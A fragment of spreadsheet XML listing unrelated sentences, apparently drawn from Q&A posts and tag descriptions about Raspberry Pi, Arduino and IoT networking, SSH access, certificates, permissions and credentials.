    <t>Most of the time when I run my face recognition application, it runs fine.</t>
  </si>
  <si>
    <t>Whats the common way to do this with a arduino behind a firewall.</t>
  </si>
  <si>
    <t>When the USB Stick is pulled, I use xscreensaver-command -lock to lock the machine.</t>
  </si>
  <si>
    <t>I'm remotely logging into my Raspberry Pi via SSH.</t>
  </si>
  <si>
    <t>Everything must be done locally as cloud access is not guaranteed.</t>
  </si>
  <si>
    <t>I currently have my Raspberry pi setup with network connectivity and i can connect to it via local ip addres like this:
192.168.0.x
Is there anyway i use my puplic ip to ssh into my raspberry pi ?</t>
  </si>
  <si>
    <t>It is possible to ensure this level of security only on the server side?</t>
  </si>
  <si>
    <t>I can get both of them to encrypt and decrypt their own messages, but their set ups seem very different and haven't been able to encrypt each others.</t>
  </si>
  <si>
    <t>Is such detection possible without adding any extra code in that ino file?</t>
  </si>
  <si>
    <t>When I start script by connecting with ssh everything works fine.</t>
  </si>
  <si>
    <t>I have plans to log the data in a server an access it remotely...</t>
  </si>
  <si>
    <t>Normally, in a 802.15.4 packet, there is the flag "Security level" that say what AES is used (AES-CCM, AES-CTR or AES-CBC).</t>
  </si>
  <si>
    <t>It does not matter to me if this code is repaired alternative code would be equally valid.</t>
  </si>
  <si>
    <t>This morning I switched on the raspi and the ssh does not work.</t>
  </si>
  <si>
    <t>I have a raspberry Pi at home that I can access over the internet using SSH (using only key authentication), which is behind a TP-Link router.</t>
  </si>
  <si>
    <t>And set the permissions back to executable.</t>
  </si>
  <si>
    <t>I detect the key with TkInter module, but it needs a graphic environment.</t>
  </si>
  <si>
    <t>Here's the file:
When I try to connect, however, I get this error: 
I am able to connect to my home networks and others that have passwords just fine.</t>
  </si>
  <si>
    <t>I have installed vsftpd, and I wanted to secure it with SSL/TLS (it worked well when ssl is disabled).</t>
  </si>
  <si>
    <t>I'm running a fresh installed mosquitto on the pi so there's no username or password required to connect to the broker.</t>
  </si>
  <si>
    <t>Please inform me if I need to provide extra information.</t>
  </si>
  <si>
    <t>I am trying find a solution which would allow me to SSH (or connect some other way) into the RaspberryPi while it is connected to my iPhone's wifi hotspot.</t>
  </si>
  <si>
    <t>I have checked the credentials and everything is fine.</t>
  </si>
  <si>
    <t>The POST using Postman (local) works well, I don't have any firewall.</t>
  </si>
  <si>
    <t>I am trying to do ssh connection from Ubuntu machine to a pi.</t>
  </si>
  <si>
    <t>(No need for configuring port forwarding, firewalls, etc).</t>
  </si>
  <si>
    <t>(password required)
Opening an ssh session with the device.</t>
  </si>
  <si>
    <t>I am not sure whether it installs firmware created by Jasper or in other way.</t>
  </si>
  <si>
    <t>That means without direct connection to any other access points.</t>
  </si>
  <si>
    <t>I just bought a new Intel Edison and flashed the newest Yocto 3.0 image.</t>
  </si>
  <si>
    <t>I configured the bitbucket oauth as described here (Tutorial).</t>
  </si>
  <si>
    <t>Important: The key is decoded from base64 and used as key to perform the HMAC-SHA256 computation."</t>
  </si>
  <si>
    <t>It works fine in a simple network without proxy.</t>
  </si>
  <si>
    <t>The public ip of the modem keeps changing.</t>
  </si>
  <si>
    <t>When a device connects with another device, I seem to be unable to retrieve the IP address of that other device.</t>
  </si>
  <si>
    <t>I'm trying to remotely access my Raspberry Pi Zero using SSH.</t>
  </si>
  <si>
    <t>It is an undecorated window and 
is used to create the transparency.</t>
  </si>
  <si>
    <t>If I wrap "Login" in a  tag it renders correctly.</t>
  </si>
  <si>
    <t>After unplug and re-plug the network cable in the router the network on the raspberry turns to work.</t>
  </si>
  <si>
    <t>WiringPi requires sudo privilege to access the hardware pins.</t>
  </si>
  <si>
    <t>I connected the USBasp correctly and also updated the firmware.</t>
  </si>
  <si>
    <t>store the credentials locally.</t>
  </si>
  <si>
    <t>But we can't show any window when we run the program via SSH.</t>
  </si>
  <si>
    <t>Trying to write to the DB and getting unwanted anonymous keys.</t>
  </si>
  <si>
    <t>AT+CWJAP="SSID","PASSWORD"
AT+CIPSTART="TCP","192.168.0.104",80
AT+CIPSEND=35
GET /receiver.php?SAP=69 HTTP/1.1
Now i'm not getting any updates on the text file.</t>
  </si>
  <si>
    <t>I would like to use bluetooth because AdaFruit provided a very hackable app for the phone.</t>
  </si>
  <si>
    <t>It runs completely fine on intel architecture.</t>
  </si>
  <si>
    <t>This works fine on a PC, but on Windows 10 IoT it stops at Got a token.</t>
  </si>
  <si>
    <t>Error in kh (line 2)
fopen(Arduino)
and here is arduino error:
avrdude: ser_open(): can't open device "\\.\COM4": Access is denied.</t>
  </si>
  <si>
    <t>If I disable bluetooth on the Pi, the device becomes available for connections.</t>
  </si>
  <si>
    <t>I am currently trying to install via Python pip on my raspberry pi 1 Model B using ssh.</t>
  </si>
  <si>
    <t>If anyone could tell me what the script does and/or what the attackers were trying to do that would be great.</t>
  </si>
  <si>
    <t>This needs communication between 2 devices on the same wireless network before connecting to router with SSID, password.</t>
  </si>
  <si>
    <t>Currently, I have implemented the key on the hosting Raspi itself.</t>
  </si>
  <si>
    <t>This is the only thing they are used for except for ssh access for configuring.</t>
  </si>
  <si>
    <t>When internet on eth0 returns then it must disconnect the 3G modem again.</t>
  </si>
  <si>
    <t>I already tried disabling the firewall (UFW) but it doesn't change anything.</t>
  </si>
  <si>
    <t>However, how do I avoid hardcoding SSID and Password in my sketch?</t>
  </si>
  <si>
    <t>I wanted to know if there was a way to secure the traffic between my Rapsberry Pi, which runs Docker, and my computer on the same local network with SSL protocol.</t>
  </si>
  <si>
    <t>When i try to enroll a device (Android) i get :
Enrollment failed
Please contact administrator.</t>
  </si>
  <si>
    <t>(A capture card and arduinos, no usb drives from untrusted sources).</t>
  </si>
  <si>
    <t>I've a signing and compiled APK but I can not install it on a rooted device.</t>
  </si>
  <si>
    <t>Broker works fine and it does not need a password or username
Problem is with Aplication - that is my first work with Android Studio.</t>
  </si>
  <si>
    <t>When installing MySQL using:
I was never prompted to provide a password.</t>
  </si>
  <si>
    <t>I am trying to implement a passwordbox within a pivotitem with content dialog.</t>
  </si>
  <si>
    <t>When I go to the public IP, instead of seeing my webpage, I see the login to my apartment's router.</t>
  </si>
  <si>
    <t>It orders Maven to connect to my Rpi via ssh, copies the .jar and executes it.</t>
  </si>
  <si>
    <t>I have permissions in Manifest too(both FINE and COARSE location).</t>
  </si>
  <si>
    <t>This is my simple code:
I am getting a "The channel sent is invalid on a Raspberry Pi".</t>
  </si>
  <si>
    <t>Can u solve me the pin configuration.</t>
  </si>
  <si>
    <t>Can I install the Ubuntu IBM Secure Gateway client?</t>
  </si>
  <si>
    <t>I'm getting the following errors when trying to connect to a server with HTTPS while Bluetooth is running.</t>
  </si>
  <si>
    <t>I have updated the firmware, and added a certificate for https://maker.ifttt.com:443.</t>
  </si>
  <si>
    <t>Currently, I am using SSH to connect to the other machine but it asks for password every time.</t>
  </si>
  <si>
    <t>which I think bitbucket ssh key stored in the host(rpi) and with this technic I will copy that keys in to container.</t>
  </si>
  <si>
    <t>Problem
 When min version is 16299 the request is authorised correctly by the remote server.</t>
  </si>
  <si>
    <t>This will allow me to register the installed location of the device with an upstream server.</t>
  </si>
  <si>
    <t>I have followed the steps necessary for MySQL remote access suggested here.</t>
  </si>
  <si>
    <t>Then copy over the key and cert files with adafruit-ampy.</t>
  </si>
  <si>
    <t>My goal was, that the printer is set up at first login by a profile.d-script.</t>
  </si>
  <si>
    <t>I'm currently trying to lock/unlock/set codes on a kwikset Zwave lock through python-openzwave on a raspberry pi running rasbian.</t>
  </si>
  <si>
    <t>But every time i want to connect with ssh username@host it says permission denied.</t>
  </si>
  <si>
    <t>As now, I edited the ssh_config on my laptop and the sshd_config on the raspberry.</t>
  </si>
  <si>
    <t>At this time i have checked on permissions on the file /usr/lib/systemd/systemd, but they are set right:
4 drwxr-xr-x.</t>
  </si>
  <si>
    <t>(I get a denied, need an account with creation permissions...etc)
2.)</t>
  </si>
  <si>
    <t>Since my router and provider doesn't allow me to portforward anything, I have to use hamachi to be able to access these two devices from outside internet.</t>
  </si>
  <si>
    <t>I was running into certificate errors when installing the java dependencies form dpkg.</t>
  </si>
  <si>
    <t>But I prefer decentralized architecture.</t>
  </si>
  <si>
    <t>Instead we have to keep remote key pressed to transmit key code.</t>
  </si>
  <si>
    <t>The API in DLL:
Failed to called this api,GetLastError = 5,means "Access Denied".</t>
  </si>
  <si>
    <t>Where are the logs exposed by the  command stored?</t>
  </si>
  <si>
    <t>Install the app and try to register.</t>
  </si>
  <si>
    <t>Note: i use a company proxy...but i don't know if it is important because anyway docker works.</t>
  </si>
  <si>
    <t>I've added the respective credentials to my  file.</t>
  </si>
  <si>
    <t>I got it connected to WIFI but the device does not show up as a USB device in Windows Explorer which is needed to update the firmware.</t>
  </si>
  <si>
    <t>I have some API Gateway endpoints setup that already authenticate my users.</t>
  </si>
  <si>
    <t>Google home mini, google home app and assistant app can't controll the assistant on raspberry and the device registered on google action even connecting all on the same wifi.</t>
  </si>
  <si>
    <t>I could do this using HTTP but I would have to expose a port to my pi.</t>
  </si>
  <si>
    <t>Mar  2 22:08:59 raspberrypi sh[342]: eth0=eth0
Mar  2 22:09:01 raspberrypi kernel: [   69.318477] smsc95xx 1-1.1:1.0 eth0: link up, 100Mbps, full-duplex, lpa 0x45E1
Mar  2 22:09:01 raspberrypi kernel: [   69.318961] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
Mar  2 22:09:02 raspberrypi avahi-daemon[313]: Joining mDNS multicast group on interface eth0.IPv6 with address fe80::ba27:ebff:fe4e:86bf.</t>
  </si>
  <si>
    <t>Also I am setting up my  IPsec/L2TP using strongSwan and xl2tpd but using Ipsec verify, on path ipsec verison is Libreswan 3.27 (netkey) on 4.14.98-v7+.</t>
  </si>
  <si>
    <t>This is my code:
Security is not important so I can write the password in the Python script.</t>
  </si>
  <si>
    <t>I have tried installing the signed version through Android Studio, but I get 'Password verification failed'.</t>
  </si>
  <si>
    <t>i am trying to connect a Raspberry Pi via Bluetooth and pushing the wifi password in order to connect to the Wif-fi</t>
  </si>
  <si>
    <t>AWS IOT connection from the federated login(in cognito Identity) was unsuccessful  
In cognito user pool i set up and identity provider with Microsoft account as OIDC and login with microsoft office credentials.</t>
  </si>
  <si>
    <t>I did it this way so I could shut down one script without compromising the others if need be.</t>
  </si>
  <si>
    <t>This works fine on the nano until the interrupt (zero cross detection) interrupts this.</t>
  </si>
  <si>
    <t>I'm running this on a Raspberry Pi 3+, the script I'm running has 777 permissions and is owned by pi:www-data, if that helps.</t>
  </si>
  <si>
    <t>The ROOTCERT string is taken directly from the certificate file, so they must be identical.</t>
  </si>
  <si>
    <t>The certificate file was downloaded and exported using Windows's certificate exporter.</t>
  </si>
  <si>
    <t>Also configured Pi as Access Point and BLE peripheral.</t>
  </si>
  <si>
    <t>I coded the on the module using arduino IDE and on my laptop I'm using spyder.</t>
  </si>
  <si>
    <t>After that, I added an arduino USB shield in order to connect it to an MRC12 USB barcode scanner.</t>
  </si>
  <si>
    <t>Try to sign in with different user if you still wish to gain access to this location."</t>
  </si>
  <si>
    <t>The smartphone and the chip don't know each other and are not connected in any way.</t>
  </si>
  <si>
    <t>If I can change the keybinding that would be preferable but if have to disable thats fine as well.</t>
  </si>
  <si>
    <t>I have a python3 program that I run without any problems on a headless raspberry pi configuration where I connect using ssh.</t>
  </si>
  <si>
    <t>Right now Rpi boots -&gt; login as pi user to CLI -&gt; and waits for action.</t>
  </si>
  <si>
    <t>I have a SIM card for each connection, one has the private APN configured.</t>
  </si>
  <si>
    <t>In the future, I want to make a authenticator of webauthn.</t>
  </si>
  <si>
    <t>I need to run the app on a Raspberry PI but don't know how the credentials are stored / retrieved.</t>
  </si>
  <si>
    <t>Is there a way to set the location of the credentials in code?</t>
  </si>
  <si>
    <t>Today I prefer to use SFTP (SSH).</t>
  </si>
  <si>
    <t>On your Windows laptop, install DeviceSpy from Intel UPnP Developer Tools.</t>
  </si>
  <si>
    <t>If the values in the EEPROM are 0xff, which they will be when you first flash the chip, don't copy them into the secret code.</t>
  </si>
  <si>
    <t>2) Ground connections are very important and should be reliable.</t>
  </si>
  <si>
    <t>Considering those two requirements:-
RXTX on android is not an out of the box lib and may require some hacking which may or may not work.</t>
  </si>
  <si>
    <t>What I did in my situation was to set a Reservation on my router for this MAC address.</t>
  </si>
  <si>
    <t>So you see now, you are very much within the safe operating area.</t>
  </si>
  <si>
    <t>You could also trigger this shell script over SSH from your local machine, e.g.</t>
  </si>
  <si>
    <t>using nano):
replace this line:
with this: 
1:2345:respawn:/bin/login -f pi tty1 &lt;/dev/tty1 &gt;/dev/tty1 2&gt;&amp;1
This will automatically login on tty1 upon startup.</t>
  </si>
  <si>
    <t>If DHCP is on, and you hooked it into your router, login to your router to see which IP it was assigned.</t>
  </si>
  <si>
    <t>You can control rpi trought ssh simply from windows, linux, android, iOs using a ssh telnet/client.</t>
  </si>
  <si>
    <t>You can then use that to tie the two together with SSH port forwarding (tunnelling).</t>
  </si>
  <si>
    <t>This prevent unauthorize access for example from the Windows/Linux to the sd card files.</t>
  </si>
  <si>
    <t>You will need to be root or use sudo in order to write your changes to the file.</t>
  </si>
  <si>
    <t>At a guess, the reset button may lock the SIM again, and that's why it appears to lose the network.</t>
  </si>
  <si>
    <t>However, as I always connected directly to telehack.com's telnet server and I couldn't understand what was going on.</t>
  </si>
  <si>
    <t>Well, if www-data has sudo privileges it can do anything including wiping out your system.</t>
  </si>
  <si>
    <t>As wifi connections to your access point work fine.</t>
  </si>
  <si>
    <t xml:space="preserve"> appears to be a signed type on your machine.</t>
  </si>
  <si>
    <t>Mount folder with sshfs
sudo sshfs -p PORT_NUMBER -o allow_other -o IdentityFile=~/.ssh/id_rsa user@192.XXX.XXX.XXX:./folder/to/mount /mnt/example/location
The -o allow_other parameter is very important, as you won't have access to the mount otherwise.</t>
  </si>
  <si>
    <t>So this is kind of a vague question, because we don't know exactly what your setup is and what's up with your firewall.</t>
  </si>
  <si>
    <t>Whats the common way to do this with an Arduino behind a firewall.</t>
  </si>
  <si>
    <t>This way, you can automatically set up your network on software.</t>
  </si>
  <si>
    <t>However, you will want to ensure that the user's input is actually a digit.</t>
  </si>
  <si>
    <t>This can be done by configuring your router for DHCP reservation by using the Pi's MAC (ethernet hardware address), if it supports it.</t>
  </si>
  <si>
    <t>The PIC hex file contain: code, EEPROM data, user bytes (User ID) and configuration words.</t>
  </si>
  <si>
    <t>If you need to access it from outside it's still possible by using a service like noip and opening the port on your router.</t>
  </si>
  <si>
    <t>Are you running screen from inside a ssh connection?</t>
  </si>
  <si>
    <t>To use the GPIO pins, the Python script needs to be run with administrator privileges.</t>
  </si>
  <si>
    <t>You would probably use  to expose the sysfs interface.</t>
  </si>
  <si>
    <t>minicom needs a configuration file that is under root permissions and is stored at /etc/minicom/ and is named minirc.dfl.</t>
  </si>
  <si>
    <t>We need to add a firewall rule to Windows 10 iot.</t>
  </si>
  <si>
    <t>There's a pcap http python parser here
https://github.com/xiaxiaocao/pcap-parser 
Other parser also exist (dpkt), but beware that the traffic may be encrypted.</t>
  </si>
  <si>
    <t>My issue was an incorrect firmware update process using my Mac.</t>
  </si>
  <si>
    <t>More details
iBeacon is basically a Bluetooth LE Broadcaster and it can only be discovered by a Central or an Observer.</t>
  </si>
  <si>
    <t>Warning: if you don't "own" the network, someone may be angry with you for scanning their machines.</t>
  </si>
  <si>
    <t>Since you can't join a network through an end device, you're not going to see beacons coming from those devices.</t>
  </si>
  <si>
    <t>if you want for now copy the files that are created in lib to the below with sudo permissions.</t>
  </si>
  <si>
    <t>In case LRADC0 (again schematics) it us used for buttons (vol +/-, menu, search, ...) and LRADC1 is exposed through GPIO-1 pin 39.</t>
  </si>
  <si>
    <t>we should be able to retrieve the unmasked I2C address from the TWDR register.</t>
  </si>
  <si>
    <t>After you do the change you can configure your services to use the new Primary key.</t>
  </si>
  <si>
    <t>Ensure that the shared object file's permissions are sane (0755).</t>
  </si>
  <si>
    <t>It seems like something simple, are you running the WAMP server with elevated permissions?</t>
  </si>
  <si>
    <t>The Arduino Uno exposes the RESET pin, which is all that is needed for a debug connection via debugWIRE.</t>
  </si>
  <si>
    <t>Implementing FFT and digital filtering is not really hard.</t>
  </si>
  <si>
    <t>So even if you were to encrypt your code, it has to be decrypted in order to run, and it will just be viewed then instead.</t>
  </si>
  <si>
    <t>connect the key to your raspberry and enter a PSSession with PowerShell (details here: https://developer.microsoft.com/en-us/windows/iot/win10/samples/powershell).</t>
  </si>
  <si>
    <t>So static IP addresses are to be configured in .</t>
  </si>
  <si>
    <t>Works in background, also after that the app has been killed, since the discoverability setting is preserved.</t>
  </si>
  <si>
    <t>There are add on shields to control most hardware and even Bluetooth and WiFi connectivity.</t>
  </si>
  <si>
    <t>However, RTI has been merged with IoTP recently and I'm not sure if IBM has exposed the above API from IoTP as of now.</t>
  </si>
  <si>
    <t>Also ensure you have the latest firmware.</t>
  </si>
  <si>
    <t>It provides a startup script /etc/init.d/noip2 (owned by root with 755 permissions).</t>
  </si>
  <si>
    <t>The ip address configured for wlan0 should now appear if ifconfig is issued.</t>
  </si>
  <si>
    <t>v4l2capture requires libv4l by default.</t>
  </si>
  <si>
    <t>Now you should be able to access the internet over wifi through router.</t>
  </si>
  <si>
    <t>I had already added the ProxyPass and ProxyReverse in the site configuration files.</t>
  </si>
  <si>
    <t>Sonos doesn't understand it as the error code 401 means "invalid action".</t>
  </si>
  <si>
    <t>I added an exception in my antivirus and now it works fine.</t>
  </si>
  <si>
    <t>Qt Creator creates configuration files in project directory, because he can not decrypt makefile.</t>
  </si>
  <si>
    <t>Over-the-Air Activation (OTAA) Over-the-Air Activation (OTAA) is the
  preferred and most secure way to connect with The Things Network.</t>
  </si>
  <si>
    <t>OpenCV is required for me to detect the object as any Haar classifier can be used.</t>
  </si>
  <si>
    <t>But I think a User-Agent spoof should just work fine.</t>
  </si>
  <si>
    <t>If you install a script in your own crontab, it will run under your own user id (you probabl shouldn't use sudo), so it will read the right .Xauthority file.</t>
  </si>
  <si>
    <t>Until you have working output from this program, you don't know if lirc can decode your remote.</t>
  </si>
  <si>
    <t>After this, go into sudo raspi-config and enable ssh (which is another option just like pi-camera).</t>
  </si>
  <si>
    <t>Could you please provide a code snippet where your web server listens / exposes itself ?</t>
  </si>
  <si>
    <t>I structured a command to suspend or shutdown a remote host over ssh.</t>
  </si>
  <si>
    <t>You can Set folder permissions for UWP apps.</t>
  </si>
  <si>
    <t>You should set the Common Name as "_demoDevice" when authenticating you x.509 device.</t>
  </si>
  <si>
    <t>If the app is removed, all of the app data will be lost as a consequence.</t>
  </si>
  <si>
    <t>Are the JTAG pins even exposed on the board?</t>
  </si>
  <si>
    <t>When you first connect to MQTT, the last published configuration will be sent to the device.</t>
  </si>
  <si>
    <t>There is no "konsole" here, the only interface is a remote ssh session connected to the network instead of to a terminal window.</t>
  </si>
  <si>
    <t>you should not disable ipv6 in modern Windows.</t>
  </si>
  <si>
    <t>Try ensuring your certificate is active in the IOT console.</t>
  </si>
  <si>
    <t>UPDATE: There is nice article about Azure IoT hub and certificates: Certificate between IoT hub and devices connection</t>
  </si>
  <si>
    <t>The only way to reset the faulty configuration was to reboot the PI itself.</t>
  </si>
  <si>
    <t>If your background is uniform, any edge detection filter may work better than your background subtraction.</t>
  </si>
  <si>
    <t>I wouldn't really know much about easily installing SSH keys, but Google will always be your friend.</t>
  </si>
  <si>
    <t>psk is the passphrase to connect and authenticate to the router or access point.</t>
  </si>
  <si>
    <t>Since i was not able to do it from the front end consol, I tried the "Alternative ways to register".</t>
  </si>
  <si>
    <t>If you can't configure it like that, there's always the option to use a hardwired AND gate on the /CS signal.</t>
  </si>
  <si>
    <t>You can hide it behind the router so it is more less safe.</t>
  </si>
  <si>
    <t>Popular ways out are:
Use IPv6 (obliviating the use of a NAT) and (at least selectively) disable the firewall.</t>
  </si>
  <si>
    <t>It can be activated by commenting out the blacklist in /etc/modprobe.d/blacklist-rtl8192cu.conf.</t>
  </si>
  <si>
    <t>Both new and old endpoints are interoperable (the only difference is the certificate).</t>
  </si>
  <si>
    <t>I'm sure you can also program it via SSH, but this may be very difficult to set up.</t>
  </si>
  <si>
    <t>When the token expires you'll get an updated one using the same private key.</t>
  </si>
  <si>
    <t>But I'm guessing the device capapability isn't set for serial access.</t>
  </si>
  <si>
    <t>This is because, if the leaf device is a child device, EdgeHub will try to authenticate it locally, and for that it only uses the devices key.</t>
  </si>
  <si>
    <t>Limited validation and enablement has been completed.</t>
  </si>
  <si>
    <t>As of now, the mqtt only implementation still seems to require certificates during connection to the AWS-IoT broker.</t>
  </si>
  <si>
    <t>Ensure it is connected to the internet.</t>
  </si>
  <si>
    <t>If you already know the address of the device you want to connect to, you don't need to do the Bluetooth LE scanning.</t>
  </si>
  <si>
    <t>I have got same error(Code 52) when I installed driver without Microsoft signature.</t>
  </si>
  <si>
    <t>Sample code:
Now, filtered should contain unique items.</t>
  </si>
  <si>
    <t>NetWork Manager (nmcli) might be running on the device and has been configured to work with a static IP.</t>
  </si>
  <si>
    <t>I'm not sure what that file is, but I haven't needed it in order to validate my GCP IoT clients.</t>
  </si>
  <si>
    <t>If you have a firewall, are you allowing data on port 3306 ?</t>
  </si>
  <si>
    <t>The Azure IoT Hub does not expose certain IP addresses or ranges.</t>
  </si>
  <si>
    <t>Now you can work with OpenCV in Python (assuming that your configuration is valid).</t>
  </si>
  <si>
    <t>mbedtls_aes_crypt_ctr docs say the function updates both nonce_counter and stream_block.</t>
  </si>
  <si>
    <t>This code will set whatever key was last pressed to the 'key' variable.</t>
  </si>
  <si>
    <t>The ESP32 is a nice alternative without the same security flaw.</t>
  </si>
  <si>
    <t>OpenSSH is the most widespread and de-facto standard implementation of SSH protocol.</t>
  </si>
  <si>
    <t>Oracle Data Access Components are data access drivers and tools for Windows.</t>
  </si>
  <si>
    <t>WinRS is the Windows Remote Shell, a system administration tool that allows remote shell access.</t>
  </si>
  <si>
    <t>Is an approach to authentication which requires the presentation of two or more authentication factors.</t>
  </si>
  <si>
    <t>They can also provide an extra layer of security by asking for a pin or a gesture.</t>
  </si>
  <si>
    <t>SSHFS (Secure Shell File System) is a file system client to mount and interact with directories and files located on a remote server or workstation.</t>
  </si>
  <si>
    <t>Universal Verification Methodology</t>
  </si>
  <si>
    <t>Connect/express middleware that validates a JsonWebToken (JWT) and set the req.user with the attributes</t>
  </si>
  <si>
    <t>Lavaboom is the email provider of whistleblowers, activists, lawyers, journalists and regular folks like you.</t>
  </si>
  <si>
    <t>A set of clean abstractions for authentication in Ember.js</t>
  </si>
  <si>
    <t>Helicon Ape by Helicon Tech provides support for Apache .htaccess and .htpasswd configuration files in Microsoft IIS.</t>
  </si>
  <si>
    <t>Pandorabots is a RESTful API for integrating artificially intelligent chatbots into applications.</t>
  </si>
  <si>
    <t>*** This tag has been burninated, and is pending blacklisting.</t>
  </si>
  <si>
    <t>This identification allows to segregate that sets, or to provide some contextual or provenance metadata.</t>
  </si>
  <si>
    <t>HttpOnly is a flag in the cookie header to hide data from JavaScript</t>
  </si>
  <si>
    <t>It allows for configured hosts to use the user without the password.</t>
  </si>
  <si>
    <t>ModSecurity is a web application layer firewall.</t>
  </si>
  <si>
    <t>CryptoAPI Next Generation (CNG) is the next version of the Windows CryptoAPI available since Vista.</t>
  </si>
  <si>
    <t>Do NOT use for direct manipulation through Google Apps Script or for access through Google Drive API.</t>
  </si>
  <si>
    <t>No internet connection or hotspot is needed.</t>
  </si>
  <si>
    <t>Trying to perform an operation on a file, but you don;t have the appropriate security authorizations.</t>
  </si>
  <si>
    <t>The SET IDENTITY_INSERT option can be used to achieve this.</t>
  </si>
  <si>
    <t>The API and the expression language exploit Java-beans naming patterns through
introspection to expose property getters and setters.</t>
  </si>
  <si>
    <t>If the central repository is breached, all certificates are compromised at once.</t>
  </si>
  <si>
    <t>Tsung will send X TPS every second even if tested system cannot cope - so you can expose bottlnecks.</t>
  </si>
  <si>
    <t>Both these functions can be suppressed, if desired.</t>
  </si>
  <si>
    <t>Fortify on Demand provides application security services remotely.</t>
  </si>
  <si>
    <t>(Tampermonkey scripts have fewer security restrictions than ordinary javascript).</t>
  </si>
  <si>
    <t>The analyzer can be run at night on the server and warn about suspicious code fragments.</t>
  </si>
  <si>
    <t>"Excessively" active patch submitters will be granted commit access.</t>
  </si>
  <si>
    <t>This means that it can't be used for managing configuration files attached to the application.</t>
  </si>
  <si>
    <t>Developer can access those fakes through the mocker, or developer can just ignore them if they're not important.</t>
  </si>
  <si>
    <t>The data-charset attribute is optional and specifies which charset to use when loading the external file.</t>
  </si>
  <si>
    <t>For example, discussion on Android malwares, permission model and application isolation are preferred.</t>
  </si>
  <si>
    <t>SSLSocketFactory will enable server authentication when supplied with a truststore file containg one or several trusted certificates.</t>
  </si>
  <si>
    <t>It is sometimes used to boot devices without data storage or to update firmware.</t>
  </si>
  <si>
    <t>It allows the user to selectively disable permissions of installed apps.</t>
  </si>
  <si>
    <t>These devices are often seen in the wild at a place where a signature is required.</t>
  </si>
  <si>
    <t>In addition to exposing the data model, SAP HANA XS also hosts system services that are part of the SAP HANA system.</t>
  </si>
  <si>
    <t>the CDM), to allow playback of encrypted audio and video.</t>
  </si>
  <si>
    <t>Kii Cloud also supports the authentication with external accounts like Facebook and Twitter.</t>
  </si>
  <si>
    <t>Authentication
Authentication is required to send messages to users.</t>
  </si>
  <si>
    <t>The application must be built with the appropriate permissions in order for this capability to work.</t>
  </si>
  <si>
    <t>Canny's aim was to discover the optimal edge detection algorithm.</t>
  </si>
  <si>
    <t>Data access can help distinguish the abilities of Administrators and users.</t>
  </si>
  <si>
    <t>The verification of the bytecode has another very important advantage.</t>
  </si>
  <si>
    <t>It also has direct support for OAuth and OpenID.</t>
  </si>
  <si>
    <t>They are authorization endpoint and token endpoint.</t>
  </si>
  <si>
    <t>A camel component which provides access to remote file-systems over the FTP and SFTP protocols.</t>
  </si>
  <si>
    <t>You can also allow certain domain accounts to access your application while denying access to others.</t>
  </si>
  <si>
    <t>Annotation that allows exposing methods to JavaScript.</t>
  </si>
  <si>
    <t>your firewall is not functioning correctly.</t>
  </si>
  <si>
    <t>ROT13 doesn't require a key as parameter and is therefore not a cipher.</t>
  </si>
  <si>
    <t>On June 4, 2009, Wind River announced that Intel had bought the
  company for a reported $884 million.</t>
  </si>
  <si>
    <t>Little Snitch is a host-based application firewall for Mac OS X.
https://www.obdev.at/products/littlesnitch/index.html</t>
  </si>
  <si>
    <t>Schematic illustration of a online exam with Safe Exam Browser and a LMS, for example ILIAS or Moodle.</t>
  </si>
  <si>
    <t>This means your keys can't be lost or maliciously destroyed, as sometimes happens.</t>
  </si>
  <si>
    <t>Route guards allowing for routes to be reactively disabled.</t>
  </si>
  <si>
    <t>As well as remote data access, it added partitioned Application Servers and messaging.</t>
  </si>
  <si>
    <t>can communicate with an Android device through USB (USB debugging must be enabled).</t>
  </si>
  <si>
    <t>Any kind of password prompt
If ssh or sudo asks for a password, it will fail in cron since the jobs run in the background with no user to interact with them.</t>
  </si>
  <si>
    <t>Essentially any
key, button or combination can become a hotkey.</t>
  </si>
  <si>
    <t>Links
Business Intelligence on web archive</t>
  </si>
  <si>
    <t>Safari is the web browser bundled with iOS and macOS, operating systems from Apple.</t>
  </si>
  <si>
    <t>The authenticated user's contacts The contacts scope has been granted.</t>
  </si>
  <si>
    <t>However, denormalization always brings the danger of update anomalies to the database.</t>
  </si>
  <si>
    <t>With ABAC, it is possible to define finer-grained access policies.</t>
  </si>
  <si>
    <t>These standards are unencrypted broadcast television.</t>
  </si>
  <si>
    <t>Once onReceive() returns, the AlarmManager releases this wake lock.</t>
  </si>
  <si>
    <t>He can perpetrate both passive (eavesdropping) and active (interjection or truncation) attacks.</t>
  </si>
  <si>
    <t>Flags aren't being moderated quickly during IST.</t>
  </si>
  <si>
    <t>Even if the issue is not known, is there any way to debug the SSH call and see where exactly it's failing when I use the external IP?</t>
  </si>
  <si>
    <t>I'm interested in which fingerprint scanner to use in a project with arduino or raspberry pi.</t>
  </si>
  <si>
    <t>For the device JWT, you can verify it from jwt.io and should ensure the aud and alg payloads are what is expected for AuthN.</t>
  </si>
  <si>
    <t>If I boot pi with wifi preplugged in, pi also freeze on asking for login id.</t>
  </si>
  <si>
    <t>I am working on a project for which I am using MS SQL server and using Windows authentication.</t>
  </si>
  <si>
    <t>Jan 15 12:14:28 raspberrypi systemd[1]: Started Forward Password Requests to Plymouth Directory Watch.</t>
  </si>
  <si>
    <t>The permission of the token that is generated is limited of-course.</t>
  </si>
  <si>
    <t>You can try to ignore certificates with that
Update 
as I can see here exists on Mono also</t>
  </si>
  <si>
    <t>:)  ...at least until the portal's login timeout window expires.</t>
  </si>
  <si>
    <t>One of the options is Windows Authentication.</t>
  </si>
  <si>
    <t>It would just attract every bot and hacker out there.</t>
  </si>
  <si>
    <t>I would like to ask you if there is any way to start raspberry pi (using Raspbian) without login and password and to move directly to the GUI.</t>
  </si>
  <si>
    <t>If i do it from a SSH client connected directly with the Pi this works.</t>
  </si>
  <si>
    <t>Is there a way to login directly to the device?</t>
  </si>
  <si>
    <t>I don't think I really care about security.</t>
  </si>
  <si>
    <t>You can't register a UserSensor directly with SensorManager.</t>
  </si>
  <si>
    <t>NOTE : I'm going to create a database to store the fingerprints of the users that they're allowed to enter the room for example.</t>
  </si>
  <si>
    <t>the example of modifying source codes is as follows:
Force disconnect a P2P Client/STA from GO/AP side
hostapd: make it possible to remove addresses from  maclists</t>
  </si>
  <si>
    <t>My network (PC and RPI) is as follow:
A Certificate Authority (CA)PC1
An OrdererPC1
1 PEER (peer0) onPC1
1 PEER (peer1) onRP
CLI on RPI
I setup the above network successfully, and i'm able to run the chaincode example 2 that is provided by hyperledger fabric (install, query,invoke).</t>
  </si>
  <si>
